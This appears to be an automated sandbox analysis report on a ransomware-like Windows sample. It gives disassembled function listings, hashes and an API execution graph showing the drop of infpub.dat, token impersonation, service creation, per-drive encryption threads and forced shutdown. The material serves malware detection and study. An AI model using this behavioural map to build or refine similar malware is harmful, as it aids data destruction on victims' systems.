                                                                      control_flow_graph 70 c01260-c01282 CreateFileW 71 c01284-c01297 WriteFile 70->71 72 c012aa-c012af 70->72 73 c012a3-c012a4 CloseHandle 71->73 74 c01299-c0129c 71->74 73->72 74->73 75 c0129e 74->75 75->73
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,00C013F0,?,?,?), ref: 00C01277
                                                                      • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00C013F0,?,?,?), ref: 00C0128F
                                                                      • CloseHandle.KERNELBASE(00000000,?,00C013F0,?,?,?), ref: 00C012A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID: C:\Windows\infpub.dat
                                                                      • API String ID: 1065093856-2284094909
                                                                      • Opcode ID: 5ff51f42886e0609d62366c1fbb07f17db5ac1062712925e682f585b0e223026
                                                                      • Instruction ID: 4836befd4585c1a1875535e15e5d21dadb0ae9665f5b4a0eb7f8e57a3aa7ece3
                                                                      • Opcode Fuzzy Hash: 5ff51f42886e0609d62366c1fbb07f17db5ac1062712925e682f585b0e223026
                                                                      • Instruction Fuzzy Hash: 51F08CB6A012147BD7205B56EC4CF9B7EADEBC6BA6F064129FF14D61C0D6608D41C2B0

                                                                      Non-executed Functions

                                                                      Function 00C0201D Relevance: 12.1, Strings: 9, Instructions: 826COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • invalid distances set, xrefs: 00C023FA
                                                                      • invalid distance too far back, xrefs: 00C02859
                                                                      • invalid literal/length code, xrefs: 00C025FE
                                                                      • invalid code lengths set, xrefs: 00C0215D
                                                                      • invalid distance code, xrefs: 00C027B4
                                                                      • too many length or distance symbols, xrefs: 00C0209C
                                                                      • invalid literal/lengths set, xrefs: 00C023B6
                                                                      • invalid bit length repeat, xrefs: 00C02345, 00C02351
                                                                      • invalid code -- missing end-of-block, xrefs: 00C02372
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                      • API String ID: 0-2665694366
                                                                      • Opcode ID: 8d4de91cbbbbe2c70e532ac4a629ae6eefebd1f25b769434e3dd4d0dc43206eb
                                                                      • Instruction ID: 24aa9efa9e2b52e56f1ed3c3f60774873c064d13a96d288dd04163e2427c671c
                                                                      • Opcode Fuzzy Hash: 8d4de91cbbbbe2c70e532ac4a629ae6eefebd1f25b769434e3dd4d0dc43206eb
                                                                      • Instruction Fuzzy Hash: 30626A71E00625DFCF18CF59C8946ADBBF2FF88311B1881AAD856AB385D7349A41DF90
                                                                      Function 00C0173C Relevance: 9.7, APIs: 1, Strings: 5, Instructions: 675COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: header crc mismatch$incorrect header check$invalid window size$unknown compression method$unknown header flags set
                                                                      • API String ID: 0-3633268661
                                                                      • Opcode ID: 0d4590bbe4d41cf94cf667bd9a175363810be3779f0e6613d7d983930e836cb3
                                                                      • Instruction ID: a52d291a14a49285eb55ce224270911fa62842064e8a88c4f828bf93fd65884c
                                                                      • Opcode Fuzzy Hash: 0d4590bbe4d41cf94cf667bd9a175363810be3779f0e6613d7d983930e836cb3
                                                                      • Instruction Fuzzy Hash: 30423BB0A00605DFDF19CF59C484AAEBBF2BF88300F1885A9DC55EB296D774DA41DB90
                                                                      Function 00C03840 Relevance: 8.1, Strings: 6, Instructions: 578COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 579 c03840-c038d6 580 c038d8-c038f8 579->580 581 c038fa-c03900 579->581 582 c03912 580->582 581->582 583 c03902-c03910 581->583 584 c03916-c0391d 582->584 583->581 585 c03923 584->585 586 c03bac-c03bc9 584->586 588 c03990-c03993 585->588 589 c03925-c03939 585->589 587 c03bcc-c03bd2 586->587 590 c03bd4-c03be3 587->590 591 c03be6-c03bef 587->591 592 c039a2-c039ab 588->592 593 c03995-c039a0 588->593 594 c0393b-c03945 589->594 595 c0397f 589->595 590->591 596 c03bf2-c03bfc 591->596 598 c039ae-c039b6 592->598 593->592 594->595 599 c03947-c0394d 594->599 597 c03989-c0398d 595->597 600 c03c17-c03c1e 596->600 601 c03bfe-c03c01 596->601 597->584 602 c039d1-c039da 598->602 603 c039b8-c039bb 598->603 599->595 604 c0394f-c03955 599->604 607 c03d04-c03d06 600->607 608 c03c24-c03c27 600->608 606 c03c02-c03c06 601->606 610 c039e0-c039e3 602->610 611 c03ad4-c03ad6 602->611 609 c039bc-c039c0 603->609 604->595 605 c03957-c03967 604->605 605->595 614 c03969-c0396f 605->614 617 c03e28-c03e2f 606->617 618 c03c0c-c03c10 606->618 615 c03dea-c03dec 607->615 619 c03d0c-c03d21 607->619 620 c03c29-c03c3b 608->620 621 c03c3d-c03c43 608->621 609->617 622 c039c6-c039ca 609->622 612 c039e5-c039e7 610->612 613 c03a0a-c03a11 610->613 611->615 616 c03adc-c03aef 611->616 623 c039e9-c039f8 612->623 624 c039fa-c03a08 612->624 627 c03a20-c03a2a 613->627 628 c03a13-c03a1e 613->628 625 c03971 614->625 626 c03973-c0397d 614->626 629 c03dfa-c03e04 615->629 630 c03dee-c03df8 615->630 616->598 635 c03e31 617->635 636 c03e33-c03e56 617->636 618->587 631 c03c12 618->631 619->596 620->621 632 c03c45-c03c54 621->632 633 c03c57-c03c64 621->633 622->588 634 c039cc 622->634 623->624 624->613 625->595 626->597 637 c03a2d-c03a3c 627->637 628->627 638 c03e16-c03e1c 629->638 630->638 631->617 632->633 639 c03c67-c03c76 633->639 634->617 635->636 640 c03e58-c03e68 636->640 641 c03e6c-c03e7d 636->641 644 c03a42-c03a45 637->644 645 c03af4-c03af6 637->645 646 c03e21-c03e26 638->646 647 c03e1e 638->647 648 c03d28-c03d2a 639->648 649 c03c7c-c03c7f 639->649 640->641 642 c03e87-c03e92 641->642 643 c03e7f-c03e85 641->643 656 c03e94-c03e9c 642->656 657 c03e9e-c03ea5 642->657 643->642 650 c03a47-c03a49 644->650 651 c03aac-c03aaf 644->651 654 c03afc-c03b0f 645->654 655 c03dde-c03de8 645->655 646->617 647->646 648->655 658 c03d30-c03d49 648->658 652 c03c81-c03c93 649->652 653 c03cd8-c03cdb 649->653 662 c03a4b-c03a5a 650->662 663 c03a5c-c03a6c 650->663 664 c03ab1-c03ab5 651->664 665 c03a6e-c03a7a 651->665 659 c03c95-c03ca1 652->659 653->659 660 c03cdd-c03ce1 653->660 654->637 655->638 661 c03ea8-c03eae 656->661 657->661 658->639 669 c03d50-c03d5e 659->669 670 c03ca7-c03cd0 659->670 660->659 671 c03ce3-c03cfd 660->671 672 c03eb0-c03ebb 661->672 673 c03ebd-c03ec7 661->673 662->663 663->665 664->665 668 c03ab7-c03acf 664->668 666 c03a80-c03aa7 665->666 667 c03b14-c03b22 665->667 666->609 674 c03e06-c03e14 667->674 675 c03b28-c03b2f 667->675 668->609 669->674 677 c03d64-c03d6b 669->677 670->606 671->606 676 c03eca-c03ed2 672->676 673->676 674->638 678 c03b31-c03b3b 675->678 679 c03b55-c03b5b 675->679 680 c03d8d-c03d93 677->680 681 c03d6d-c03d73 677->681 682 c03b9d-c03ba5 678->682 683 c03b3d-c03b45 678->683 684 c03b89-c03b93 679->684 685 c03b5d-c03b6d 679->685 688 c03d95-c03da1 680->688 689 c03dbd-c03dc3 680->689 686 c03d75-c03d7d 681->686 687 c03dcd-c03dd9 681->687 682->609 683->682 684->682 693 c03b95-c03b9b 684->693 685->682 692 c03b6f-c03b7d 685->692 686->687 687->606 688->687 690 c03da3-c03db1 688->690 689->687 691 c03dc5-c03dcb 689->691 690->687 694 c03db3-c03dbb 690->694 691->687 692->682 695 c03b7f-c03b87 692->695 693->682 694->687 695->682
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                      • API String ID: 0-3089872807
                                                                      • Opcode ID: 94acd4526c3ba1b719390f946e2a4915412de87f4ddfdaca2e8cfa91ef8e1e75
                                                                      • Instruction ID: 63d0ecec351521c511e94500794d2414ef0799c4dfea250d6e0a0c3f25cef8c8
                                                                      • Opcode Fuzzy Hash: 94acd4526c3ba1b719390f946e2a4915412de87f4ddfdaca2e8cfa91ef8e1e75
                                                                      • Instruction Fuzzy Hash: 43122932A183818FDB15DE3CC58422ABBE5ABC4314F148A2DE8A6D7B80D371DF49D781
                                                                      Function 00C01499 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C01566
                                                                      • UnhandledExcep.KERNEL32(00C04080), ref: 00C01571
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00C0157C
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00C01583
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessUnhandled$CurrentExcepExceptionFilterTerminate
                                                                      • String ID:
                                                                      • API String ID: 1999905405-0
                                                                      • Opcode ID: c0d0726c06ae35ab8b0d4ce00fa716c521157e8d037b8163fd75f39e164082b3
                                                                      • Instruction ID: 2ff413895d119ca7fcaa832486850d814427f8696795fab45d785eda3098dd3e
                                                                      • Opcode Fuzzy Hash: c0d0726c06ae35ab8b0d4ce00fa716c521157e8d037b8163fd75f39e164082b3
                                                                      • Instruction Fuzzy Hash: F6219DB5905604DBC740DF69FD8574C7BB4BF5C318B02C02AE68893260EBB0598ECF59
                                                                      Function 00C030E3 Relevance: .2, Instructions: 200COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1694192599.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                      • Associated: 00000000.00000002.1694161071.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694212594.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1694234094.0000000000C09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_download.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d39eeb028271dddfdbac4f3bf1ab381d8d61b8aa8212f666553d0915efeae787
                                                                      • Instruction ID: d7428ca742b9eaf4cef022b8ef1d9c9de4a23da44787c04236417ad04bf12840
                                                                      • Opcode Fuzzy Hash: d39eeb028271dddfdbac4f3bf1ab381d8d61b8aa8212f666553d0915efeae787
                                                                      • Instruction Fuzzy Hash: D0716B717209829BD718DF1EECD072E73A2F78974074B8539DA05873A1C635EA22CAD4

                                                                      Execution Graph

                                                                      Execution Coverage:16.6%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:26.5%
                                                                      Total number of Nodes:1421
                                                                      Total number of Limit Nodes:37
                                                                      execution_graph 6524 485ace4 6528 485a8be 6524->6528 6525 485becb 3 API calls 6527 485aed0 6525->6527 6526 485bb4f 6526->6525 6526->6527 6528->6526 6528->6527 6529 485ac8f memcpy 6528->6529 6529->6528 6530 485c4a6 free 6531 485682f 6532 4856865 6531->6532 6533 485683a 6531->6533 6534 4856856 6533->6534 6535 485684e GetProcessHeap HeapFree 6533->6535 6534->6532 6536 485685d GetProcessHeap HeapFree 6534->6536 6535->6534 6536->6532 6508 485b9d5 6509 485b9df 6508->6509 6510 485becb 3 API calls 6509->6510 6511 485aed2 6509->6511 6510->6511 4852 4859154 FreeLibrary 4853 4859176 CreateFileW 4852->4853 4854 485923a 4852->4854 4855 48591a1 GetFileSize CloseHandle CreateFileW 4853->4855 4856 485920d DeleteFileW 4853->4856 4855->4856 4857 48591ca GetProcessHeap RtlAllocateHeap 4855->4857 4864 4859016 4856->4864 4860 48591e5 WriteFile GetProcessHeap HeapFree 4857->4860 4861 4859204 CloseHandle 4857->4861 4860->4861 4861->4856 4862 4859233 ExitProcess 4865 4859146 4864->4865 4867 485903a VirtualProtect 4864->4867 4865->4862 4873 48579d7 4865->4873 4867->4865 4871 485909e 4867->4871 4868 4859129 VirtualProtect 4868->4865 4869 48590b0 LoadLibraryA 4869->4871 4870 4859123 4870->4865 4870->4868 4871->4868 4871->4869 4871->4870 4872 48590fa GetProcAddress 4871->4872 4872->4871 4931 4857897 4873->4931 4876 48579fc 4958 4857f04 GetComputerNameW 4876->4958 4880 4857a05 ExitProcess 4881 4857a0d 4882 4857a1b 4881->4882 4964 4857e8e 4881->4964 4976 48584ee CreateToolhelp32Snapshot 4882->4976 4890 4856c5f 13 API calls 4891 4857a70 InitializeCriticalSection 4890->4891 5006 485652f 4891->5006 4898 4857ad5 CreateThread 4900 4857af8 4898->4900 4901 4857aea 4898->4901 6262 48577d1 4898->6262 4899 4857b99 4902 4857bde Sleep 4899->4902 5069 485554a CryptAcquireContextW 4899->5069 5062 4856cc8 4900->5062 4901->4900 5036 4857146 4901->5036 5079 4858a23 4902->5079 4908 4857b03 4910 4857b63 4908->4910 4911 4857b0c 4908->4911 4915 4856cc8 3 API calls 4910->4915 4916 4856c5f 13 API calls 4911->4916 4918 4857b6e CreateThread 4915->4918 4919 4857b1e 4916->4919 5065 485a420 GetProcessHeap HeapAlloc 4918->5065 6244 485a1a9 4918->6244 5087 48585fb 4919->5087 4929 4857b2f 4929->4910 5106 485a3b1 CreateThread 4929->5106 5114 485796e CreateThread 4929->5114 5121 4856e66 4929->5121 4932 4857936 4931->4932 4933 48578a8 GetTickCount srand GetTickCount 4931->4933 4932->4876 4946 485923f 4932->4946 5136 4857cc5 GetCurrentProcess OpenProcessToken 4933->5136 4935 48578cc 4936 4857cc5 6 API calls 4935->4936 4937 48578db 4936->4937 4938 4857cc5 6 API calls 4937->4938 4939 48578ec 4938->4939 5141 485855f CreateToolhelp32Snapshot 4939->5141 4942 485554a 4 API calls 4943 485790e GetModuleFileNameW 4942->4943 4943->4932 4944 4857931 4943->4944 5147 4858832 CreateFileW 4944->5147 4947 4859252 4946->4947 4948 485932c 4946->4948 4947->4948 4949 485925e VirtualAlloc 4947->4949 4948->4876 4950 4859329 4949->4950 4951 485928b memcpy 4949->4951 4950->4948 4952 48592f8 VirtualProtect 4951->4952 4955 48592a9 4951->4955 4952->4950 4953 485930d VirtualFree 4952->4953 4953->4950 4955->4952 5156 4858f35 VirtualProtect 4955->5156 4959 4857f45 4958->4959 4960 4857a01 4958->4960 4961 4857f74 wsprintfW CreateMutexW 4959->4961 4960->4880 4960->4881 4962 4857f99 GetLastError 4961->4962 4963 4857fab GetLastError 4961->4963 4962->4960 4963->4960 5160 4857e69 PathCombineW 4964->5160 4967 4857ef4 4967->4882 4968 4857eaa PathFileExistsW 4969 4857efc ExitProcess 4968->4969 4970 4857ebb GetCurrentProcess 4968->4970 5162 4856f7c GetModuleHandleW GetProcAddress 4970->5162 4977 4857a20 4976->4977 4978 4858509 Process32FirstW 4976->4978 4985 48510a7 4977->4985 4979 4858523 4978->4979 4980 4858548 4979->4980 4982 4858536 Process32NextW 4979->4982 4983 485854a 4979->4983 4981 4858555 CloseHandle 4980->4981 4981->4977 4982->4979 5215 485841d 4983->5215 4986 48510c3 4985->4986 4987 48511e9 WSAStartup 4985->4987 4988 48510cc ExpandEnvironmentStringsW 4986->4988 4989 48510ec 4986->4989 5001 4856c5f GetProcessHeap HeapAlloc 4987->5001 4988->4989 4989->4989 4990 4858313 19 API calls 4989->4990 4991 4851176 4990->4991 4991->4987 4992 4851193 PathAppendW 4991->4992 4993 48511d7 GetProcessHeap HeapFree 4992->4993 4994 48511a9 4992->4994 4993->4987 4995 48587e7 3 API calls 4994->4995 4996 48511bb 4995->4996 4996->4993 5229 4851000 4996->5229 5002 4856c80 InitializeCriticalSection GetProcessHeap RtlAllocateHeap 5001->5002 5005 4856cbd 5001->5005 5003 4856cb8 5002->5003 5002->5005 5289 4856bd1 5003->5289 5005->4890 5007 485660d 5006->5007 5008 4856540 5006->5008 5021 4857dd0 5007->5021 5008->5007 5008->5008 5009 485655b CommandLineToArgvW 5008->5009 5009->5007 5010 4856576 5009->5010 5011 4856606 LocalFree 5010->5011 5012 485657f StrToIntW 5010->5012 5011->5007 5016 4856591 5012->5016 5013 48565a2 StrStrW 5014 48565c2 StrStrW 5013->5014 5013->5016 5014->5016 5017 48565dc StrChrW 5014->5017 5016->5011 5016->5013 5019 4856605 5016->5019 5296 48564a6 5016->5296 5017->5016 5018 48565e9 5017->5018 5304 48569ae 5018->5304 5019->5011 5322 4856477 GetTickCount 5021->5322 5023 4857ddc NetServerGetInfo 5024 4857e03 5023->5024 5025 4857e0e NetApiBufferFree 5024->5025 5026 4857aa3 5024->5026 5025->5026 5027 4858192 5026->5027 5028 4857aa8 CreateEventW CreateThread 5027->5028 5029 48581ab GetLocalTime 5027->5029 5028->4898 5028->4899 6279 4858a6f GetSystemMetrics 5028->6279 5323 4856477 GetTickCount 5029->5323 5031 48581ba GetSystemDirectoryW 5031->5028 5033 4858200 PathAppendW 5031->5033 5033->5028 5034 48582b9 wsprintfW 5033->5034 5035 4857fb7 6 API calls 5034->5035 5035->5028 5324 485a760 5036->5324 5039 4856f7c 2 API calls 5040 4857170 5039->5040 5041 4858313 19 API calls 5040->5041 5042 485717f 5041->5042 5043 4857339 5042->5043 5044 48571a0 GetTempFileNameW 5042->5044 5043->4900 5045 48571b8 CoCreateGuid 5044->5045 5047 4857317 5044->5047 5046 48571d6 StringFromCLSID 5045->5046 5045->5047 5046->5047 5049 48571ef 5046->5049 5047->5047 5048 4857328 GetProcessHeap HeapFree 5047->5048 5048->5043 5326 4856faf CreateFileW 5049->5326 5052 485730c CoTaskMemFree 5052->5047 5053 4857209 wsprintfW CreateThread 5054 4857247 memset wsprintfW CreateProcessW 5053->5054 5055 48572dc 5053->5055 5332 4856ffe GetProcessHeap HeapAlloc 5053->5332 5056 48572b0 WaitForSingleObject 5054->5056 5057 48572d3 CloseHandle 5054->5057 5059 4856faf 3 API calls 5055->5059 5058 4856cc8 3 API calls 5056->5058 5057->5055 5060 48572c9 TerminateThread 5058->5060 5061 48572ff DeleteFileW 5059->5061 5060->5057 5061->5052 5063 4856ccc EnterCriticalSection InterlockedExchange LeaveCriticalSection 5062->5063 5064 4856cea 5062->5064 5063->4908 5064->4908 5066 485a445 CreateThread 5065->5066 5067 4857b89 Sleep 5065->5067 5066->5067 5068 485a461 GetProcessHeap HeapFree 5066->5068 5350 485a333 Sleep 5066->5350 5067->4899 5068->5067 5070 4855578 CryptGenRandom CryptReleaseContext 5069->5070 5071 485556b GetLastError 5069->5071 5072 4855594 5070->5072 5071->5070 5071->5072 5072->4902 5073 485636b GetLogicalDrives 5072->5073 5074 485638a 5073->5074 5075 4856397 GetDriveTypeW 5074->5075 5077 4856413 5074->5077 5075->5074 5076 48563c3 LocalAlloc 5075->5076 5076->5074 5078 48563d3 CreateThread 5076->5078 5077->4902 5078->5074 5939 4856299 CreateEventW 5078->5939 6115 485808e wsprintfW wsprintfW wsprintfW wsprintfW 5079->6115 5082 4858a3f 5084 4858a67 ExitProcess 5082->5084 5085 4858a48 InitiateSystemShutdownExW 5082->5085 5083 4857fb7 6 API calls 5083->5082 5085->5084 5086 4858a5e ExitWindowsEx 5085->5086 5086->5084 5088 485a760 5087->5088 5089 485860b memset 5088->5089 6120 4858147 memset GetVersionExW 5089->6120 5092 4858658 Process32FirstW 5094 48587ca GetLastError 5092->5094 5102 4858674 5092->5102 5093 48587da 5093->4929 5096 48587d0 CloseHandle 5094->5096 5095 4858689 OpenProcess 5097 48586b2 OpenProcessToken 5095->5097 5095->5102 5096->5093 5099 48586c7 GetTokenInformation 5097->5099 5100 4858798 CloseHandle CloseHandle 5097->5100 5098 48587b1 Process32NextW 5098->5095 5101 48587c8 5098->5101 5099->5100 5099->5102 5100->5102 5101->5096 5102->5095 5102->5096 5102->5098 5102->5100 5103 48586f9 DuplicateTokenEx 5102->5103 5105 485875a SetTokenInformation 5102->5105 5103->5100 5104 4858716 memset GetTokenInformation 5103->5104 5104->5100 5104->5102 5105->5100 5105->5102 5107 485a3d6 SetThreadToken 5106->5107 5108 485a40d 5106->5108 6122 485a016 GetCurrentThread OpenThreadToken 5106->6122 5110 485a3f7 GetLastError 5107->5110 5111 485a3e7 ResumeThread 5107->5111 5109 485a410 SetLastError 5108->5109 5109->4929 5112 485a3ff CloseHandle 5110->5112 5111->5109 5113 485a3f5 5111->5113 5112->5109 5113->5112 5115 4857995 SetThreadToken 5114->5115 5116 48579d0 5114->5116 6225 4857957 5114->6225 5117 48579c7 CloseHandle 5115->5117 5118 48579a6 ResumeThread 5115->5118 5116->4929 5117->5116 5119 48579b4 WaitForSingleObject 5118->5119 5120 48579c1 GetLastError 5118->5120 5119->5117 5120->5117 5122 4856f73 5121->5122 5123 4856e7c 5121->5123 5122->4929 5123->5122 5124 4856e85 EnterCriticalSection 5123->5124 5125 4856da4 3 API calls 5124->5125 5126 4856e98 5125->5126 5127 4856f6b LeaveCriticalSection 5126->5127 5128 4856f31 GetProcessHeap HeapReAlloc 5126->5128 5129 4856eae GetProcessHeap HeapAlloc 5126->5129 5127->5122 5128->5127 5131 4856f52 5128->5131 5129->5127 5130 4856ed4 GetProcessHeap HeapAlloc 5129->5130 5132 4856f21 GetProcessHeap HeapFree 5130->5132 5133 4856ef3 memcpy 5130->5133 5134 4856e66 3 API calls 5131->5134 5132->5127 5133->5127 5135 4856f68 5134->5135 5135->5127 5137 4857d3c SetLastError 5136->5137 5138 4857cfa LookupPrivilegeValueW 5136->5138 5137->4935 5138->5137 5139 4857d0c AdjustTokenPrivileges GetLastError 5138->5139 5139->5137 5140 4857d3a 5139->5140 5140->5137 5142 48578fe 5141->5142 5143 485857d Process32FirstW 5141->5143 5142->4942 5145 4858597 5143->5145 5144 48585ee CloseHandle 5144->5142 5145->5144 5146 48585dc Process32NextW 5145->5146 5146->5145 5148 48588cd 5147->5148 5149 485885d GetFileSize 5147->5149 5148->4932 5150 48588c3 CloseHandle 5149->5150 5151 485886c GetProcessHeap HeapAlloc 5149->5151 5150->5148 5152 48588af 5151->5152 5153 4858882 ReadFile 5151->5153 5152->5150 5153->5152 5154 4858899 5153->5154 5154->5152 5155 485889e GetProcessHeap HeapFree 5154->5155 5155->5152 5157 4858fc8 5156->5157 5158 4858f58 5156->5158 5157->4952 5158->5157 5159 4858fa1 VirtualProtect 5158->5159 5159->5158 5161 4857e86 5160->5161 5161->4967 5161->4968 5163 4856f9f 5162->5163 5164 4858313 FindResourceW 5163->5164 5165 4857edd 5164->5165 5166 485833a LoadResource 5164->5166 5165->4967 5179 48587e7 CreateFileW 5165->5179 5166->5165 5167 485834f LockResource 5166->5167 5167->5165 5168 4858361 SizeofResource 5167->5168 5168->5165 5169 4858379 GetProcessHeap RtlAllocateHeap 5168->5169 5169->5165 5170 4858395 memcpy 5169->5170 5171 48583b5 GetProcessHeap RtlAllocateHeap 5170->5171 5172 48583ab 5170->5172 5173 4858407 GetProcessHeap RtlFreeHeap 5171->5173 5174 48583c7 5171->5174 5172->5171 5173->5165 5184 485a790 5174->5184 5176 48583e1 5177 48583e5 5176->5177 5178 48583fa GetProcessHeap HeapFree 5176->5178 5177->5173 5178->5173 5180 4858809 WriteFile 5179->5180 5181 485882a 5179->5181 5182 4858823 CloseHandle 5180->5182 5183 485881d 5180->5183 5181->4967 5182->5181 5183->5182 5189 485bda1 5184->5189 5188 485a7d9 5188->5176 5198 485bd14 5189->5198 5191 485a7c9 5191->5188 5192 485a83c 5191->5192 5193 485a850 5192->5193 5197 485aed0 5192->5197 5194 485bb4f 5193->5194 5196 485ac8f memcpy 5193->5196 5193->5197 5194->5197 5209 485becb 5194->5209 5196->5193 5197->5188 5199 485bd21 5198->5199 5200 485bd33 5198->5200 5199->5200 5203 485c493 5199->5203 5205 485c4ef 5199->5205 5200->5191 5204 485c496 malloc 5203->5204 5204->5200 5206 485c496 malloc 5205->5206 5207 485c4ed 5205->5207 5206->5200 5207->5205 5208 485c4f9 5207->5208 5208->5200 5210 485bee1 5209->5210 5211 485bf21 memcpy 5210->5211 5212 485bf39 memcpy 5210->5212 5213 485befa 5210->5213 5211->5213 5212->5213 5214 485bf58 memcpy 5212->5214 5213->5197 5214->5213 5216 4858430 GetCurrentProcessId 5215->5216 5217 48584e8 5215->5217 5216->5217 5218 485843f OpenProcess 5216->5218 5217->4981 5218->5217 5219 485845c OpenProcessToken 5218->5219 5220 48584e4 CloseHandle 5219->5220 5221 4858474 DuplicateToken 5219->5221 5220->5217 5222 4858487 AllocateAndInitializeSid 5221->5222 5223 48584df CloseHandle 5221->5223 5224 48584ad CheckTokenMembership 5222->5224 5225 48584da CloseHandle 5222->5225 5223->5220 5226 48584c4 5224->5226 5227 48584d1 FreeSid 5224->5227 5225->5223 5226->5227 5228 48584c9 TerminateProcess 5226->5228 5227->5225 5228->5227 5253 4857fb7 wsprintfW GetEnvironmentVariableW 5229->5253 5232 4851027 GetEnvironmentVariableW 5234 4851043 GetSystemDirectoryW 5232->5234 5235 485106b wsprintfW 5232->5235 5233 485101c Sleep 5233->5232 5237 4851055 lstrcatW 5234->5237 5238 485109d 5234->5238 5236 4857fb7 6 API calls 5235->5236 5236->5238 5237->5235 5237->5238 5239 4851531 5238->5239 5240 4851533 5239->5240 5240->5240 5260 4851368 OpenSCManagerW 5240->5260 5243 485155a 5247 48511d0 5243->5247 5268 48511ef RegOpenKeyW 5243->5268 5247->4993 5248 48511ef 7 API calls 5249 4851582 5248->5249 5249->5247 5250 4851588 GetVersion 5249->5250 5250->5247 5251 4851592 5250->5251 5252 48511ef 7 API calls 5251->5252 5252->5247 5254 4858004 GetSystemDirectoryW 5253->5254 5257 485802c 5253->5257 5255 4851018 5254->5255 5256 4858016 lstrcatW 5254->5256 5255->5232 5255->5233 5256->5255 5256->5257 5257->5257 5258 4858046 CreateProcessW 5257->5258 5258->5255 5259 4858075 Sleep 5258->5259 5259->5255 5261 4851383 GetLastError 5260->5261 5262 485138e CreateServiceW 5260->5262 5263 48513e1 5261->5263 5264 48513c7 GetLastError 5262->5264 5265 48513c2 5262->5265 5263->5243 5277 48513e8 wsprintfW RegOpenKeyExW 5263->5277 5264->5265 5266 48513dd CloseServiceHandle 5265->5266 5267 48513da CloseServiceHandle 5265->5267 5266->5263 